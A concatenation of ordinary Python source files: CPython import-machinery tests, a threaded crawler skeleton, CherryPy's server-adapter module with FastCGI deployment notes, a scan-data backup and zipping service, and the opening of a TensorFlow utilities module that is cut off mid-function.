importlib.import_module(self.package_name)
@cpython_only
class ImportlibBootstrapTests(unittest.TestCase):
# These tests check that importlib is bootstrapped.
def test_frozen_importlib(self):
mod = sys.modules['_frozen_importlib']
self.assertTrue(mod)
def test_frozen_importlib_is_bootstrap(self):
from importlib import _bootstrap
mod = sys.modules['_frozen_importlib']
self.assertIs(mod, _bootstrap)
self.assertEqual(mod.__name__, 'importlib._bootstrap')
self.assertEqual(mod.__package__, 'importlib')
self.assertTrue(mod.__file__.endswith('_bootstrap.py'), mod.__file__)
def test_frozen_importlib_external_is_bootstrap_external(self):
from importlib import _bootstrap_external
mod = sys.modules['_frozen_importlib_external']
self.assertIs(mod, _bootstrap_external)
self.assertEqual(mod.__name__, 'importlib._bootstrap_external')
self.assertEqual(mod.__package__, 'importlib')
self.assertTrue(mod.__file__.endswith('_bootstrap_external.py'), mod.__file__)
def test_there_can_be_only_one(self):
# Issue #15386 revealed a tricky loophole in the bootstrapping
# This test is technically redundant, since the bug caused importing
# this test module to crash completely, but it helps prove the point
from importlib import machinery
mod = sys.modules['_frozen_importlib']
self.assertIs(machinery.ModuleSpec, mod.ModuleSpec)
@cpython_only
class GetSourcefileTests(unittest.TestCase):
"""Test importlib._bootstrap_external._get_sourcefile() as used by the C API.
    Because of the peculiar way this function is needed, the tests are
    knowingly whitebox tests.
"""
def test_get_sourcefile(self):
# Given a valid bytecode path, return the path to the corresponding
# source file if it exists.
with mock.patch('importlib._bootstrap_external._path_isfile') as _path_isfile:
            _path_isfile.return_value = True
path = TESTFN + '.pyc'
expect = TESTFN + '.py'
self.assertEqual(_get_sourcefile(path), expect)
def test_get_sourcefile_no_source(self):
# Given a valid bytecode path without a corresponding source path,
# return the original bytecode path.
with mock.patch('importlib._bootstrap_external._path_isfile') as _path_isfile:
            _path_isfile.return_value = False
path = TESTFN + '.pyc'
self.assertEqual(_get_sourcefile(path), path)
def test_get_sourcefile_bad_ext(self):
# Given a path with an invalid bytecode extension, return the
# bytecode path passed as the argument.
path = TESTFN + '.bad_ext'
self.assertEqual(_get_sourcefile(path), path)
class ImportTracebackTests(unittest.TestCase):
def setUp(self):
os.mkdir(TESTFN)
self.old_path = sys.path[:]
sys.path.insert(0, TESTFN)
def tearDown(self):
sys.path[:] = self.old_path
rmtree(TESTFN)
def create_module(self, mod, contents, ext=".py"):
fname = os.path.join(TESTFN, mod + ext)
with open(fname, "w") as f:
f.write(contents)
self.addCleanup(unload, mod)
importlib.invalidate_caches()
return fname
def assert_traceback(self, tb, files):
deduped_files = []
while tb:
code = tb.tb_frame.f_code
fn = code.co_filename
if not deduped_files or fn != deduped_files[-1]:
deduped_files.append(fn)
tb = tb.tb_next
self.assertEqual(len(deduped_files), len(files), deduped_files)
for fn, pat in zip(deduped_files, files):
self.assertIn(pat, fn)
def test_nonexistent_module(self):
try:
# assertRaises() clears __traceback__
import nonexistent_xyzzy
except ImportError as e:
tb = e.__traceback__
else:
self.fail("ImportError should have been raised")
self.assert_traceback(tb, [__file__])
def test_nonexistent_module_nested(self):
self.create_module("foo", "import nonexistent_xyzzy")
try:
import foo
except ImportError as e:
tb = e.__traceback__
else:
self.fail("ImportError should have been raised")
self.assert_traceback(tb, [__file__, 'foo.py'])
def test_exec_failure(self):
self.create_module("foo", "1/0")
try:
import foo
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ZeroDivisionError should have been raised")
self.assert_traceback(tb, [__file__, 'foo.py'])
def test_exec_failure_nested(self):
self.create_module("foo", "import bar")
self.create_module("bar", "1/0")
try:
import foo
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ZeroDivisionError should have been raised")
self.assert_traceback(tb, [__file__, 'foo.py', 'bar.py'])
# A few more examples from issue #15425
def test_syntax_error(self):
self.create_module("foo", "invalid syntax is invalid")
try:
import foo
except SyntaxError as e:
tb = e.__traceback__
else:
self.fail("SyntaxError should have been raised")
self.assert_traceback(tb, [__file__])
def _setup_broken_package(self, parent, child):
pkg_name = "_parent_foo"
self.addCleanup(unload, pkg_name)
pkg_path = os.path.join(TESTFN, pkg_name)
os.mkdir(pkg_path)
# Touch the __init__.py
init_path = os.path.join(pkg_path, '__init__.py')
with open(init_path, 'w') as f:
f.write(parent)
bar_path = os.path.join(pkg_path, 'bar.py')
with open(bar_path, 'w') as f:
f.write(child)
importlib.invalidate_caches()
return init_path, bar_path
def test_broken_submodule(self):
init_path, bar_path = self._setup_broken_package("", "1/0")
try:
import _parent_foo.bar
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ZeroDivisionError should have been raised")
self.assert_traceback(tb, [__file__, bar_path])
def test_broken_from(self):
init_path, bar_path = self._setup_broken_package("", "1/0")
try:
from _parent_foo import bar
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ImportError should have been raised")
self.assert_traceback(tb, [__file__, bar_path])
def test_broken_parent(self):
init_path, bar_path = self._setup_broken_package("1/0", "")
try:
import _parent_foo.bar
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ZeroDivisionError should have been raised")
self.assert_traceback(tb, [__file__, init_path])
def test_broken_parent_from(self):
init_path, bar_path = self._setup_broken_package("1/0", "")
try:
from _parent_foo import bar
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ZeroDivisionError should have been raised")
self.assert_traceback(tb, [__file__, init_path])
@cpython_only
def test_import_bug(self):
# We simulate a bug in importlib and check that it's not stripped
# away from the traceback.
self.create_module("foo", "")
importlib = sys.modules['_frozen_importlib_external']
if 'load_module' in vars(importlib.SourceLoader):
old_exec_module = importlib.SourceLoader.exec_module
else:
old_exec_module = None
try:
def exec_module(*args):
1/0
importlib.SourceLoader.exec_module = exec_module
try:
import foo
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ZeroDivisionError should have been raised")
self.assert_traceback(tb, [__file__, '<frozen importlib', __file__])
finally:
if old_exec_module is None:
del importlib.SourceLoader.exec_module
else:
importlib.SourceLoader.exec_module = old_exec_module
@unittest.skipUnless(TESTFN_UNENCODABLE, 'need TESTFN_UNENCODABLE')
def test_unencodable_filename(self):
# Issue #11619: The Python parser and the import machinery must not
# encode filenames, especially on Windows
pyname = script_helper.make_script('', TESTFN_UNENCODABLE, 'pass')
self.addCleanup(unlink, pyname)
name = pyname[:-3]
script_helper.assert_python_ok("-c", "mod = __import__(%a)" % name,
__isolated=False)
class CircularImportTests(unittest.TestCase):
"""See the docstrings of the modules being imported for the purpose of the
test."""
def tearDown(self):
"""Make sure no modules pre-exist in sys.modules which are being used to
test."""
for key in list(sys.modules.keys()):
if key.startswith('test.test_import.data.circular_imports'):
del sys.modules[key]
def test_direct(self):
try:
import test.test_import.data.circular_imports.basic
except ImportError:
self.fail('circular import through relative imports failed')
def test_indirect(self):
try:
import test.test_import.data.circular_imports.indirect
except ImportError:
self.fail('relative import in module contributing to circular '
'import failed')
def test_subpackage(self):
try:
import test.test_import.data.circular_imports.subpackage
except ImportError:
self.fail('circular import involving a subpackage failed')
def test_rebinding(self):
try:
import test.test_import.data.circular_imports.rebinding as rebinding
except ImportError:
self.fail('circular import with rebinding of module attribute failed')
from test.test_import.data.circular_imports.subpkg import util
self.assertIs(util.util, rebinding.util)
def test_binding(self):
try:
import test.test_import.data.circular_imports.binding
except ImportError:
self.fail('circular import with binding a submodule to a name failed')
if __name__ == '__main__':
# Test needs to be a package, so we can do relative imports.
unittest.main()
|
07_threadingExample.py
|
from threading import Thread
from queue import Queue
class XxxSpider:
def __init__(self):
self.url = 'http://www.abc.com/page{}.html'
self.q = Queue()
def url_to_q(self):
"""
        Generate all page URL addresses and put them into the queue
:return:
"""
for page in range(1, 100001):
page_url = self.url.format(page)
self.q.put(page_url)
def parse_url(self):
"""线程事件函数,获取地址,请求解析数据处理"""
while not self.q.empty():
url = self.q.get()
            # Take one URL, send the request to it, then parse and process the data.
            # When several threads write to the same file they contend for it;
            # the fix is to guard the writes with a thread lock (see the sketch
            # after the class).
pass
def crawl(self):
        # Put all URL addresses into the queue
self.url_to_q()
        # Create the crawler threads (5 of them)
t_list = []
for i in range(5):
            t = Thread(target=self.parse_url)
t_list.append(t)
t.start()
        # Wait for all threads to finish
for t in t_list:
t.join()
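
# A minimal sketch (not part of the original spider) of the thread-lock idea
# mentioned in parse_url: when several threads append to the same output file,
# serialize the writes with a shared threading.Lock. The helper name and the
# output file name are illustrative assumptions.
from threading import Lock

_save_lock = Lock()

def save_line(line, path='result.txt'):
    """Append one parsed record to a shared output file under the lock."""
    with _save_lock:
        with open(path, 'a', encoding='utf-8') as f:
            f.write(line + '\n')
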
if __name__ == '__main__':
spider = XxxSpider()
spider.crawl()
|
servers.py
|
r"""
Starting in CherryPy 3.1, cherrypy.server is implemented as an
:ref:`Engine Plugin<plugins>`. It's an instance of
:class:`cherrypy._cpserver.Server`, which is a subclass of
:class:`cherrypy.process.servers.ServerAdapter`. The ``ServerAdapter`` class
is designed to control other servers, as well.
Multiple servers/ports
======================
If you need to start more than one HTTP server (to serve on multiple ports, or
protocols, etc.), you can manually register each one and then start them all
with engine.start::
s1 = ServerAdapter(
cherrypy.engine,
MyWSGIServer(host='0.0.0.0', port=80)
)
s2 = ServerAdapter(
cherrypy.engine,
another.HTTPServer(host='127.0.0.1', SSL=True)
)
s1.subscribe()
s2.subscribe()
cherrypy.engine.start()
.. index:: SCGI
FastCGI/SCGI
============
There are also Flup\ **F**\ CGIServer and Flup\ **S**\ CGIServer classes in
:mod:`cherrypy.process.servers`. To start an fcgi server, for example,
wrap an instance of it in a ServerAdapter::
addr = ('0.0.0.0', 4000)
f = servers.FlupFCGIServer(application=cherrypy.tree, bindAddress=addr)
s = servers.ServerAdapter(cherrypy.engine, httpserver=f, bind_addr=addr)
s.subscribe()
The :doc:`cherryd</deployguide/cherryd>` startup script will do the above for
you via its `-f` flag.
Note that you need to download and install `flup <http://trac.saddi.com/flup>`_
yourself, whether you use ``cherryd`` or not.
.. _fastcgi:
.. index:: FastCGI
FastCGI
-------
A very simple setup lets your CherryPy application run with FastCGI.
You just need the flup library,
plus a running Apache server (with ``mod_fastcgi``) or lighttpd server.
CherryPy code
^^^^^^^^^^^^^
hello.py::
#!/usr/bin/python
import cherrypy
class HelloWorld:
'''Sample request handler class.'''
@cherrypy.expose
def index(self):
return "Hello world!"
cherrypy.tree.mount(HelloWorld())
# CherryPy autoreload must be disabled for the flup server to work
cherrypy.config.update({'engine.autoreload.on':False})
Then run :doc:`/deployguide/cherryd` with the '-f' arg::
cherryd -c <myconfig> -d -f -i hello.py
Apache
^^^^^^
At the top level in httpd.conf::
FastCgiIpcDir /tmp
FastCgiServer /path/to/cherry.fcgi -idle-timeout 120 -processes 4
And inside the relevant VirtualHost section::
# FastCGI config
AddHandler fastcgi-script .fcgi
ScriptAliasMatch (.*$) /path/to/cherry.fcgi$1
Lighttpd
^^^^^^^^
For `Lighttpd <http://www.lighttpd.net/>`_ you can follow these
instructions. Within ``lighttpd.conf`` make sure ``mod_fastcgi`` is
active within ``server.modules``. Then, within your ``$HTTP["host"]``
directive, configure your fastcgi script like the following::
$HTTP["url"] =~ "" {
fastcgi.server = (
"/" => (
"script.fcgi" => (
"bin-path" => "/path/to/your/script.fcgi",
"socket" => "/tmp/script.sock",
"check-local" => "disable",
"disable-time" => 1,
"min-procs" => 1,
"max-procs" => 1, # adjust as needed
),
),
)
    } # end of $HTTP["url"] =~ ""
Please see `Lighttpd FastCGI Docs
<http://redmine.lighttpd.net/wiki/lighttpd/Docs:ModFastCGI>`_ for
an explanation of the possible configuration options.
"""
import os
import sys
import time
import warnings
import contextlib
import portend
class Timeouts:
occupied = 5
free = 1
class ServerAdapter(object):
"""Adapter for an HTTP server.
If you need to start more than one HTTP server (to serve on multiple
ports, or protocols, etc.), you can manually register each one and then
start them all with bus.start::
s1 = ServerAdapter(bus, MyWSGIServer(host='0.0.0.0', port=80))
s2 = ServerAdapter(bus, another.HTTPServer(host='127.0.0.1', SSL=True))
s1.subscribe()
s2.subscribe()
bus.start()
"""
def __init__(self, bus, httpserver=None, bind_addr=None):
self.bus = bus
self.httpserver = httpserver
self.bind_addr = bind_addr
self.interrupt = None
self.running = False
def subscribe(self):
self.bus.subscribe('start', self.start)
self.bus.subscribe('stop', self.stop)
def unsubscribe(self):
self.bus.unsubscribe('start', self.start)
self.bus.unsubscribe('stop', self.stop)
def start(self):
"""Start the HTTP server."""
if self.running:
self.bus.log('Already serving on %s' % self.description)
return
self.interrupt = None
if not self.httpserver:
raise ValueError('No HTTP server has been created.')
if not os.environ.get('LISTEN_PID', None):
# Start the httpserver in a new thread.
if isinstance(self.bind_addr, tuple):
portend.free(*self.bind_addr, timeout=Timeouts.free)
import threading
t = threading.Thread(target=self._start_http_thread)
t.setName('HTTPServer ' + t.getName())
t.start()
self.wait()
self.running = True
self.bus.log('Serving on %s' % self.description)
start.priority = 75
@property
def description(self):
"""
A description about where this server is bound.
"""
if self.bind_addr is None:
on_what = 'unknown interface (dynamic?)'
elif isinstance(self.bind_addr, tuple):
on_what = self._get_base()
else:
on_what = 'socket file: %s' % self.bind_addr
return on_what
def _get_base(self):
if not self.httpserver:
return ''
host, port = self.bound_addr
if getattr(self.httpserver, 'ssl_adapter', None):
scheme = 'https'
if port != 443:
host += ':%s' % port
else:
scheme = 'http'
if port != 80:
host += ':%s' % port
return '%s://%s' % (scheme, host)
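    # For example (illustrative values): bind_addr ('0.0.0.0', 8080) with no
    # SSL adapter yields 'http://0.0.0.0:8080'; ('0.0.0.0', 443) with an SSL
    # adapter yields 'https://0.0.0.0'.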
def _start_http_thread(self):
"""HTTP servers MUST be running in new threads, so that the
main thread persists to receive KeyboardInterrupt's. If an
exception is raised in the httpserver's thread then it's
trapped here, and the bus (and therefore our httpserver)
are shut down.
"""
try:
self.httpserver.start()
except KeyboardInterrupt:
self.bus.log('<Ctrl-C> hit: shutting down HTTP server')
self.interrupt = sys.exc_info()[1]
self.bus.exit()
except SystemExit:
self.bus.log('SystemExit raised: shutting down HTTP server')
self.interrupt = sys.exc_info()[1]
self.bus.exit()
raise
except Exception:
self.interrupt = sys.exc_info()[1]
self.bus.log('Error in HTTP server: shutting down',
traceback=True, level=40)
self.bus.exit()
raise
def wait(self):
"""Wait until the HTTP server is ready to receive requests."""
while not getattr(self.httpserver, 'ready', False):
if self.interrupt:
raise self.interrupt
time.sleep(.1)
# bypass check when LISTEN_PID is set
if os.environ.get('LISTEN_PID', None):
return
# bypass check when running via socket-activation
# (for socket-activation the port will be managed by systemd)
if not isinstance(self.bind_addr, tuple):
return
# wait for port to be occupied
with _safe_wait(*self.bound_addr):
portend.occupied(*self.bound_addr, timeout=Timeouts.occupied)
@property
def bound_addr(self):
"""
The bind address, or if it's an ephemeral port and the
socket has been bound, return the actual port bound.
"""
host, port = self.bind_addr
if port == 0 and self.httpserver.socket:
# Bound to ephemeral port. Get the actual port allocated.
port = self.httpserver.socket.getsockname()[1]
return host, port
def stop(self):
"""Stop the HTTP server."""
if self.running:
# stop() MUST block until the server is *truly* stopped.
self.httpserver.stop()
# Wait for the socket to be truly freed.
if isinstance(self.bind_addr, tuple):
portend.free(*self.bound_addr, timeout=Timeouts.free)
self.running = False
self.bus.log('HTTP Server %s shut down' % self.httpserver)
else:
self.bus.log('HTTP Server %s already shut down' % self.httpserver)
stop.priority = 25
def restart(self):
"""Restart the HTTP server."""
self.stop()
self.start()
class FlupCGIServer(object):
"""Adapter for a flup.server.cgi.WSGIServer."""
def __init__(self, *args, **kwargs):
self.args = args
self.kwargs = kwargs
self.ready = False
def start(self):
"""Start the CGI server."""
# We have to instantiate the server class here because its __init__
# starts a threadpool. If we do it too early, daemonize won't work.
from flup.server.cgi import WSGIServer
self.cgiserver = WSGIServer(*self.args, **self.kwargs)
self.ready = True
self.cgiserver.run()
def stop(self):
"""Stop the HTTP server."""
self.ready = False
class FlupFCGIServer(object):
"""Adapter for a flup.server.fcgi.WSGIServer."""
def __init__(self, *args, **kwargs):
if kwargs.get('bindAddress', None) is None:
import socket
if not hasattr(socket, 'fromfd'):
raise ValueError(
'Dynamic FCGI server not available on this platform. '
'You must use a static or external one by providing a '
'legal bindAddress.')
self.args = args
self.kwargs = kwargs
self.ready = False
def start(self):
"""Start the FCGI server."""
# We have to instantiate the server class here because its __init__
# starts a threadpool. If we do it too early, daemonize won't work.
from flup.server.fcgi import WSGIServer
self.fcgiserver = WSGIServer(*self.args, **self.kwargs)
# TODO: report this bug upstream to flup.
# If we don't set _oldSIGs on Windows, we get:
# File "C:\Python24\Lib\site-packages\flup\server\threadedserver.py",
# line 108, in run
# self._restoreSignalHandlers()
# File "C:\Python24\Lib\site-packages\flup\server\threadedserver.py",
# line 156, in _restoreSignalHandlers
# for signum,handler in self._oldSIGs:
# AttributeError: 'WSGIServer' object has no attribute '_oldSIGs'
self.fcgiserver._installSignalHandlers = lambda: None
self.fcgiserver._oldSIGs = []
self.ready = True
self.fcgiserver.run()
def stop(self):
"""Stop the HTTP server."""
# Forcibly stop the fcgi server main event loop.
self.fcgiserver._keepGoing = False
# Force all worker threads to die off.
self.fcgiserver._threadPool.maxSpare = (
self.fcgiserver._threadPool._idleCount)
self.ready = False
class FlupSCGIServer(object):
"""Adapter for a flup.server.scgi.WSGIServer."""
def __init__(self, *args, **kwargs):
self.args = args
self.kwargs = kwargs
self.ready = False
def start(self):
"""Start the SCGI server."""
# We have to instantiate the server class here because its __init__
# starts a threadpool. If we do it too early, daemonize won't work.
from flup.server.scgi import WSGIServer
self.scgiserver = WSGIServer(*self.args, **self.kwargs)
# TODO: report this bug upstream to flup.
# If we don't set _oldSIGs on Windows, we get:
# File "C:\Python24\Lib\site-packages\flup\server\threadedserver.py",
# line 108, in run
# self._restoreSignalHandlers()
# File "C:\Python24\Lib\site-packages\flup\server\threadedserver.py",
# line 156, in _restoreSignalHandlers
# for signum,handler in self._oldSIGs:
# AttributeError: 'WSGIServer' object has no attribute '_oldSIGs'
self.scgiserver._installSignalHandlers = lambda: None
self.scgiserver._oldSIGs = []
self.ready = True
self.scgiserver.run()
def stop(self):
"""Stop the HTTP server."""
self.ready = False
# Forcibly stop the scgi server main event loop.
self.scgiserver._keepGoing = False
# Force all worker threads to die off.
self.scgiserver._threadPool.maxSpare = 0
@contextlib.contextmanager
def _safe_wait(host, port):
"""
On systems where a loopback interface is not available and the
server is bound to all interfaces, it's difficult to determine
whether the server is in fact occupying the port. In this case,
just issue a warning and move on. See issue #1100.
"""
try:
yield
except portend.Timeout:
if host == portend.client_host(host):
raise
msg = 'Unable to verify that the server is bound on %r' % port
warnings.warn(msg)
|
scanbackup_20210224150156.py
|
"""
1、文件到这里
一份给ES 一份给自己
新增ES旧索引入库
在继承原有功能的基础上
重构备份程序,按照数据内的
国家-当前时间(年-月-日)
如果按照数据内的时间的话也会面临和按国家端口备份的问题
不用再分端口了
create by judy 20201217
"""
from pathlib import Path
import threading
import json
from queue import Queue
import traceback
import datetime
import time
from shutil import copyfile
import zipfile
import shutil
class ScanBackUP(object):
def __init__(self) -> None:
# super().__init__()
        # All incoming data lands here first
self._input = None
        # A copy of every file goes here; this folder is not touched again by this program
self._esinput = None
        # Data to be backed up goes here; everything this program processes lives in this folder
self._dbu_input = None
self._databack = None
self._zipdata: Path = None
self._zip_size = None
        # One backup thread by default; change it in the config and restart
self.backup_thread = 1
self.zip_thread = 1
        # Switch for whether files are also copied to the ES input folder
self.copy_esinput_enable = True
self._tmp = Path('./tmp')
self._tmp.mkdir(exist_ok=True)
        # Whether a copy of each file should also go to the old ES index
self._old_esinput = None
self.config_path = Path(r'./config_path.json')
try:
self._init_cpinfo()
except:
            raise Exception(
                f"Failed to initialise config parameters, please check the config file\nerror:{traceback.format_exc()}")
        # Parameters used at runtime
        # File lock: only one thread may operate on files at a time
self.__file_locker = threading.Lock()
self.__scan_file_locker = threading.Lock()
self._zipfile_locker = threading.Lock()
        # Zipping can take quite a while, so keep a dict of folders currently being zipped
self._zip_dealing = {}
        # Pending queues assigned by file suffix; currently only iscan
self.iscan_task_queue = Queue()
self._zip_queue = Queue()
self.iscan_suffix = '.iscan_search'
# try:
# self._restore_existdata()
# except:
# raise Exception(
# "There's something wrong with restoring the environment")
def _init_cpinfo(self):
"""
        Initialise the paths and parameters from the config file
:return:
"""
conf_str = self.config_path.read_text(encoding='utf-8')
conf_dict = json.loads(conf_str)
_input = conf_dict.get('data_input')
if not isinstance(_input, str):
raise Exception("Unknown data_input path")
self._input = Path(_input)
self._input.mkdir(exist_ok=True)
print(
f"Start scan data file, input_file_path:{self._input.as_posix()}")
_esinput = conf_dict.get('es_input')
if not isinstance(_esinput, str):
raise Exception("Unknown es_input path")
self._esinput = Path(_esinput)
self._esinput.mkdir(exist_ok=True)
print(f"Save data to ES, es_path:{self._esinput.as_posix()}")
_dbuinput = conf_dict.get('backup_input')
if not isinstance(_dbuinput, str):
raise Exception("Unkown backup_input path")
self._dbu_input = Path(_dbuinput)
self._dbu_input.mkdir(exist_ok=True)
print(f"Data backup process path:{self._dbu_input.as_posix()}")
_databack = conf_dict.get('databackup')
if not isinstance(_databack, str):
raise Exception("Unknown databackup path")
self._databack = Path(_databack)
self._databack.mkdir(exist_ok=True)
print(f"Data save backup path:{self._databack.as_posix()}")
_zipdata = conf_dict.get('zipdata')
if not isinstance(_zipdata, str):
raise Exception("Unkown zipdata path")
self._zipdata = Path(_zipdata)
self._zipdata.mkdir(exist_ok=True)
print(f"Zipdata save path:{self._zipdata.as_posix()}")
_zip_size = conf_dict.get('zip_size')
if not isinstance(_zip_size, int):
raise Exception("Unknown zip_size type")
        # Convert the size from MB to bytes
self._zip_size = _zip_size * 1024 * 1024
print(f"Zip data size:{_zip_size}MB")
backupthread = conf_dict.get('backup_thread')
if not isinstance(backupthread, int):
raise Exception("Unknown backupthread type")
self.backup_thread = backupthread
zipthread = conf_dict.get('zipdata_thread')
if not isinstance(zipthread, int):
raise Exception("Unknown zipthread type")
self.zip_thread = zipthread
time_limit = conf_dict.get('time_limit')
if not isinstance(time_limit, int):
raise Exception("Unknown time_limit type")
self._backup_interval_time = time_limit * 24 * 60 * 60
print(f"Zip data time expired after {time_limit} days")
        # Copying to the ES input folder is enabled by default
copy_esinput_enable = conf_dict.get('copy_to_esinput', True)
self.copy_esinput_enable = copy_esinput_enable
        # Copy data for the old ES index
_old_esinput = conf_dict.get('old_esinput')
if not isinstance(_old_esinput, str):
raise Exception("Unknown old_esinput path")
self._old_esinput = Path(_old_esinput)
self._old_esinput.mkdir(exist_ok=True)
print(f"Save data to old ES, old_espath:{self._esinput.as_posix()}")
def scan_file(self):
"""
        Scan the input folder.
        Classify files by suffix and put them into the pending queue.
:return:
"""
while True:
try:
for file in self._input.iterdir():
name = file.name
                    # Move everything into the tmp directory
tmpname = self._tmp / name
# file.replace(tmpname)
with self.__scan_file_locker:
                        # Move the file into tmp as soon as possible; otherwise the next scan would pick it up again and cause problems
shutil.move(file.as_posix(), tmpname.as_posix())
try:
if tmpname.suffix == self.iscan_suffix:
                            # Only perform a copy operation here
# source: Path = self._input / name
target: Path = self._dbu_input / name
copyfile(tmpname.as_posix(), target.as_posix())
self.iscan_task_queue.put(target)
print(
f"Backup iscan_search data, filename:{file.as_posix()}")
except:
print(
f'Scan list file error, err:{traceback.format_exc()}')
finally:
                        # No matter what, the file must finally be sent on to esinput
if self.copy_esinput_enable:
outname = self._esinput / name
tmpname.replace(outname)
                        # Normally no file should be left here, but accidents happen, so check and delete it if it still exists
if tmpname.exists():
tmpname.unlink()
except:
print(f'Scan task file error, err:{traceback.format_exc()}')
continue
finally:
print("There is no scan data to back up")
time.sleep(0.5)
def _process_file(self, tmpfile: Path):
"""
        Open the file, read the information we need from it, then close it.
"""
with tmpfile.open('r', encoding='utf-8') as fp:
j_text = fp.read()
d_text = json.loads(j_text)
# scan_time = d_text.get('time')
# if scan_time is None:
# scan_time = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
try:
country = d_text.get('geoinfo').get('country').get('code')
except:
country = 'UNKNOWN'
return country
def back_file(self):
"""
        Start backing up data: save files into a folder first,
        then compress and store the folder once it reaches a certain size.
:return:
"""
got = False
while True:
got = False
if self.iscan_task_queue.empty():
time.sleep(0.5)
continue
try:
bfile: Path = self.iscan_task_queue.get()
got = True
name = bfile.name
                # Read the country (and date) directly from the file
country = self._process_file(bfile)
                # Before each save, check whether the target name needs changing and a zip backup should be made
date_now_str = datetime.datetime.now().strftime("%Y-%m-%d")
                # Lock only when creating a new folder; otherwise a plain move is enough
with self.__file_locker:
                    # Move the file over first
dirname: Path = self._databack / country / date_now_str
dirname.mkdir(exist_ok=True, parents=True)
                    # Name of the file after the move
filename = dirname / name
                    # Move it into the target folder
bfile.replace(filename)
print(
f"Backup file, country:{country}, filename:{name}, date:{date_now_str}")
except:
print(f'Backup file error:\n{traceback.format_exc()}')
finally:
if got:
self.iscan_task_queue.task_done()
def scan_zip_file(self):
"""
        Thread that zips files: it scans once a day and
        compresses the previous days' folders into the zip folder.
"""
while True:
try:
date_now = datetime.datetime.now().date()
for country in self._databack.iterdir():
if not country.exists():
continue
country_name = country.name
for d_file in country.iterdir():
if self._zip_dealing.__contains__(d_file):
continue
d_name = d_file.name
d_date = datetime.datetime.strptime(
d_name, "%Y-%m-%d").date()
                        # If the data is from before today, zip it
if date_now > d_date:
self._zip_queue.put((d_file, country_name))
with self._zipfile_locker:
                                # Add it to the in-progress dict
self._zip_dealing[d_file] = 1
print(
f"A file wait to zip, filename:{d_file.as_posix()}")
except:
print(f"Zip file error:\n{traceback.format_exc()}")
finally:
print("There is no scan data to zip")
time.sleep(3600)
def process_zip_file(self):
"""
        Compress folders dated before today.
"""
got = False
zipfile_path = None
while True:
got = False
if self._zip_queue.empty():
time.sleep(1)
continue
try:
zipfile_path, country = self._zip_queue.get()
got = True
zip_store_file = self._zipdata / country
zip_store_file.mkdir(exist_ok=True)
zipname = zip_store_file/f"{zipfile_path.name}.zip"
print(
f"Start zipfile, filename:{zipname.as_posix()}")
                # Add a write restriction (append to the archive rather than overwrite it)
with zipfile.ZipFile(zipname.as_posix(), 'a', zipfile.ZIP_DEFLATED) as write:
for file in zipfile_path.iterdir():
write.write(file.as_posix())
                        # Delete each file once it has been written to the archive
file.unlink()
write.close()
                # Finally remove the folder that has now been zipped
zipfile_path.rmdir()
print(
f"Store zipfile success, filename:{zipname.as_posix()}")
except:
print(f"Zip file error:\n{traceback.format_exc()}")
finally:
if got:
self._zip_queue.task_done()
with self._zipfile_locker:
self._zip_dealing.pop(zipfile_path, None)
def start(self):
"""
        Start the program (launch all worker threads)
:return:
"""
thread1 = threading.Thread(target=self.scan_file, name="scanfile")
thread1.start()
for i in range(self.backup_thread):
t = threading.Thread(target=self.back_file, name=f"backfile{i}")
t.start()
thread2 = threading.Thread(
target=self.scan_zip_file, name=f"scan_zipfile")
thread2.start()
for j in range(self.zip_thread):
tz = threading.Thread(
target=self.process_zip_file, name=f"zipfile{j}")
tz.start()
if __name__ == "__main__":
scup = ScanBackUP()
scup.start()
|
common_utils.py
|
# coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# pylint: disable=logging-format-interpolation
# pylint: disable=g-direct-tensorflow-import
# pylint: disable=unused-import
r"""Common utils."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import re
import threading
from absl import logging
import numpy as np
import tensorflow.compat.v1 as tf
# `gfile` is used by the checkpoint helpers below; the public alias lives on
# the compat.v1 namespace (`BulkDelete` additionally assumes a gfile
# implementation that provides it).
from tensorflow.compat.v1 import gfile
def get_worker_name(worker_id):
"""Returns `/job:tpu_worker/task:{worker_id}`."""
return f'/job:tpu_worker/task:{worker_id}'
def get_device_name(worker_id, core_id):
"""Returns `/job:tpu_worker/task:{worker_id}/device:tpu:{core_id}`."""
return f'/job:tpu_worker/task:{worker_id}/device:TPU:{core_id}'
def count_flops(model, params):
"""Count the number of flops."""
g = tf.Graph()
with g.as_default():
x = tf.placeholder(
dtype=tf.bfloat16 if params.use_bfloat16 else tf.float32,
shape=[1, params.image_size, params.image_size, 3])
_ = model(x, training=False)
options = tf.profiler.ProfileOptionBuilder.float_operation()
profile_out = tf.profiler.profile(graph=g, cmd='op', options=options)
return profile_out.total_float_ops
def count_params():
"""Count model params."""
num_params = sum([np.prod([d.value for d in w.shape])
for w in tf.trainable_variables()
if 'teacher' not in w.name.lower()])
return num_params
def strip_var_name(var_name):
"""Strips variable name of sub-strings blocking variable name matching.
Removes sub-strings that should be ignored when matching checkpointed variable
names to variable names in the training graph, namely:
- trailing colon + number, e.g. "W:0" --> "W"
- partitioning info., e.g. "/a/part_12/b" --> "a/b".
(Note that checkpointed variables do not have partitioning info in their name,
while model variables do).
Args:
var_name: str, variable name.
Returns:
stripped variable name.
"""
# Strip trailing number, e.g. convert "lstm/W_0:0" to "lstm/W_0".
var_name = re.sub(r':\d+$', '', var_name)
# Strip partitioning info, e.g. convert "W_0/part_3/Adagrad" to "W_0/Adagrad".
var_name = re.sub(r'/part_\d+', '', var_name)
return var_name
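
# A quick illustration (hypothetical variable names) of the two rewrites that
# strip_var_name performs, matching its docstring:
#   strip_var_name('lstm/W_0:0')             -> 'lstm/W_0'
#   strip_var_name('dense/W_0/part_3/Adam')  -> 'dense/W_0/Adam'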
def get_saver(max_to_keep=1, restore_ema=False):
"""Constructs a `Saver`."""
var_list = {}
